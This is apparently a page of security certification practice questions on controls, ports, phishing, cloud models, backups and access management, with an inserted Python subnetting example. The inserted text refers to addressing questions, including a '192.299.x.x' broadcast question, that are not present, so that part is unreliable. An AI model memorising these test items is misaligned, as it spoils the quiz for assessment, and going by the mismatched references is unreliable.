- Which of these is NOT an effective way to protect an organization from cybercriminals? (a) Removing or disabling unneeded services and protocols (b) Using firewalls (c) Using outdated anti-malware software (d) Using intrusion detection and prevention systems
- Which of these CANNOT be a corrective security control? (a) Disaster Recovery Plan (b) Backups (c) Patches (d) Bollards
- Which of these is included in an SLA document? (a) Instructions on data ownership and destruction (b) Instructions to detect, respond to, and limit the consequences of a cyber-attack (c) A plan to keep business operations going while recovering from a significant disruption (d) A plan to prepare the organization for the continuation of critical business functions
- Which port number corresponds to the Simple Mail Transfer Protocol (SMTP)? (a) 161 (b) 69 (c) 25 (d) 22
- Which type of attack attempts to mislead the user into exposing personal information by sending fraudulent emails? (a) Cross-Site Scripting (b) Denial of Service (c) Trojans (d) Phishing
- Which of these is NOT a characteristic of the cloud? (a) Zero Customer Responsibility (b) Broad Network Access (c) Measured Service (d) Rapid Elasticity
- Which of these is a COMMON mistake made when implementing record retention policies? (a) Not categorizing the type of information to be retained (b) Not labeling the type of information to be retained (c) Applying the longest retention periods to the information (d) Applying shorter retention periods to the information
- Which type of security control does NOT include CCTV cameras? (a) Corrective (b) Deterrent (c) Preventive (d) Detective
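The addressing questions in this set (telling IPv4, IPv6 and MAC addresses apart, recognising the RFC 1918 private ranges, the broadcast address of a network, the prefix length that leaves room for 30 hosts, and what a ping sweep walks) are all mechanical once you let the standard library do the arithmetic. The block below is an added example for this page, not code from the quiz; it uses only Python's ipaddress and re modules. The sample addresses and the 192.168.121.0/24 network are constructed for illustration (note that the 192.299.x.x addresses in the broadcast question above cannot exist, since an IPv4 octet tops out at 255).

```python
"""Address classification and subnet arithmetic for the network questions above.

Added example, not from the quiz. Standard library only; the sample addresses
and the 192.168.121.0/24 network are constructed for illustration.
"""
import ipaddress
import re

# EUI-48 / MAC: six hex octets, all joined by '-' or all joined by ':'.
_MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}([-:])(?:[0-9A-Fa-f]{2}\1){4}[0-9A-Fa-f]{2}$")


def classify(addr: str) -> str:
    """Return 'ipv4', 'ipv6', 'mac' or 'unknown' for a textual address."""
    if _MAC_RE.match(addr):
        return "mac"
    try:
        return f"ipv{ipaddress.ip_address(addr).version}"
    except ValueError:
        return "unknown"


def is_public(addr: str) -> bool:
    """Globally routable? RFC 1918 (10/8, 172.16/12, 192.168/16), loopback,
    link-local and the other IANA special-purpose ranges all return False."""
    return ipaddress.ip_address(addr).is_global


def broadcast_of(cidr: str) -> str:
    """Directed broadcast of a network: every host bit set to 1.
    strict=False lets a host address such as 192.168.121.14/24 be passed in."""
    return str(ipaddress.ip_network(cidr, strict=False).broadcast_address)


def usable_hosts(prefix: int) -> int:
    """Usable IPv4 hosts behind a prefix; network and broadcast are excluded."""
    if not 0 <= prefix <= 32:
        raise ValueError("IPv4 prefix must be between 0 and 32")
    return max(2 ** (32 - prefix) - 2, 0)


def prefix_for_hosts(hosts: int) -> int:
    """Longest (most specific) IPv4 prefix that still leaves `hosts` usable addresses."""
    if hosts < 1:
        raise ValueError("need at least one host")
    for prefix in range(30, -1, -1):
        if usable_hosts(prefix) >= hosts:
            return prefix
    raise ValueError("too many hosts for a single IPv4 network")


def hosts_in(cidr: str) -> list:
    """The assignable addresses of a network, i.e. what a ping sweep would probe."""
    return [str(h) for h in ipaddress.ip_network(cidr, strict=False).hosts()]


if __name__ == "__main__":
    for sample in ("8be2:4382:8d84:7ce2:ec0f:3908:d29a:903a", "13.16.123.1",
                   "00-51-02-1F-58-F6", "0051021f58"):
        print(f"{sample:45} -> {classify(sample)}")
    for sample in ("13.16.123.1", "192.168.123.1", "172.16.123.1", "10.221.123.1"):
        print(f"{sample:45} -> public={is_public(sample)}")
    print("broadcast of 192.168.121.0/24 ->", broadcast_of("192.168.121.0/24"))
    print("prefix for 30 hosts           -> /%d" % prefix_for_hosts(30))
    print("usable hosts in /27           ->", usable_hosts(27))
    print("first three sweep targets     ->", hosts_in("192.168.121.0/27")[:3])
```

The `prefix_for_hosts` loop makes the /27 answer visible: 32 minus 27 leaves 5 host bits, 2^5 is 32 addresses, and subtracting the network and broadcast addresses leaves exactly 30; a /28 would leave 14 and a /26 would waste 32.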
A security consultant hired to design the security policies for the PHI within an organization will be primarily handling: Personal Health information. Public Health information. Procedural Health information. Protected Health information. Which of these cloud deployment models is a combination of public and private cloud storage?. Community. Private. Hybrid. Public. What is the primary goal of a Change Management Policy?. To standardize the creation of the organization's network and computer systems. To guarantee that systems are up to date with the latest security patch. To standardize the usage of the organization's network and computer systems. To guarantee that system changes are performed without negatively affecting business operations. Which of these is NOT a feature of a SIEM (Security Information and Event Management)?. Log auditing. Log encryption. Log consolidation. Log retention. Which of these technologies is the LEAST effective means of preventing shared accounts?. Requiring a one-time password via an application. Requiring one-time passwords via a token. Password complexity requirements. Requiring biometric authentication. Which of these is NOT a best practice in access management?. Trust but verify. Periodically assessing whether user permissions still apply. Giving only the right amount of permission. Requesting a justification when upgrading permission. (★) When analyzing risks, which of these activities is required?. Accepting all evaluated risks. Identifying risks associated with loss of confidentiality. Determining the likelihood of occurrence of a set of risks. Selecting the appropriate controls. Which of these exercises goes through a sample of an incident step-by-step, validating what each person will do?. A simulation exercise. A walk-through exercise. A tabletop exercise. A checklist exercise. (★) Which of these types of documents is usually THE LEAST formal?. Standards. Guidelines. Policies. Regulations. 
A backup that captures the changes made since the latest full backup is an example of: A differential backup. An incremental backup. A backup snapshot. A full backup. A high-level executive of an organization receives a malicious email that tries to trick him. Which attack is the perpetrator using?. DDOS. Whaling. Phishing. Spear phishing. What does redundancy mean in the context of cybersecurity?. Designing systems with robust components, so that the organization has more attack resilience. Conceiving systems with only the most necessary components, so that the organization has just the necessary risks. Conceiving systems with less attack surface, so that the attacker has less chance of success. Conceiving systems with duplicate components so that, if a failure occurs, there will be a backup. When a company collects PII, which policy is required?. Remote Access Policy. GDPR. Privacy Policy. Acceptable Use Policy. Which type of attack PRIMARILY aims to consume all the available resources, thereby making an organization's service inaccessible to its intended users?. Trojans. Cross-Site Scripting. Denial of Service. Phishing. Which one of these tools is MOST likely to detect an XSS vulnerability?. Network vulnerability scanner. Static application test. Intrusion detection system. Web application vulnerability scanner. Which kind of physical access control is LESS effective at preventing unauthorized individual access to a data center?. Turnstiles. Barriers. Fences. Bollards. Which of these is NOT a type of malware?. Trojan. Worm. Spoofing. Rootkit. Which security principle states that a user should only have the necessary permission to execute a task?. Privileged Accounts. Separation of Duties. Least Privilege. Defense in Depth. |
